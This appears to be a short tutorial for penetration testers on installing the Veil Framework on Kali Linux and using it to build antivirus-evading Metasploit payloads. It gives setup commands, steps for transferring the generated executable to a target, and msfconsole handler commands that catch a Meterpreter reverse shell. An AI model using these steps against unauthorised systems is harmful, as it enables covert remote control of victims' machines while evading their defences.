The Veil Framework is an essential tool for penetration testers using Metasploit, as it allows for the creation of payloads designed to bypass antivirus detection. By wrapping Metasploit shellcode in languages like Python, C, or Go, Veil makes it easier to maintain access during security assessments.
Prerequisites
Before installation, ensure your Kali Linux environment is updated. This prevents dependency conflicts during the configuration of the Wine environment.
Bash
sudo apt update && sudo apt upgrade -y
Installation Procedure
- Install the PackageThe easiest method is using the Kali repository. Run the following command to download the framework and its primary dependencies:
Bash
sudo apt install veil -y
- Execute the Setup ScriptVeil requires a specific environment to compile Windows-ready executables. You must run the setup script to configure Wine, Ruby, and Python dependencies. Using the silent flag helps bypass repetitive prompts.
Bash
/usr/share/veil/config/setup.sh --force --silent
- Initialize the FrameworkOnce the setup concludes, start the program by typing:
Bash
veil
Deployment with Metasploit
To utilize a Veil payload, follow these general steps:
- In Veil, select the Evasion tool and choose a payload template.
- Configure the LHOST (your IP) and LPORT (your listening port).
- Generate the executable and transfer it to the target system.
- Open Metasploit and set up a listener to catch the connection:
Bash
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [Your IP]
set LPORT [Your Port]
run
When the generated file is executed on the target, Metasploit will establish a Meterpreter session, bypassing standard signature-based defenses.
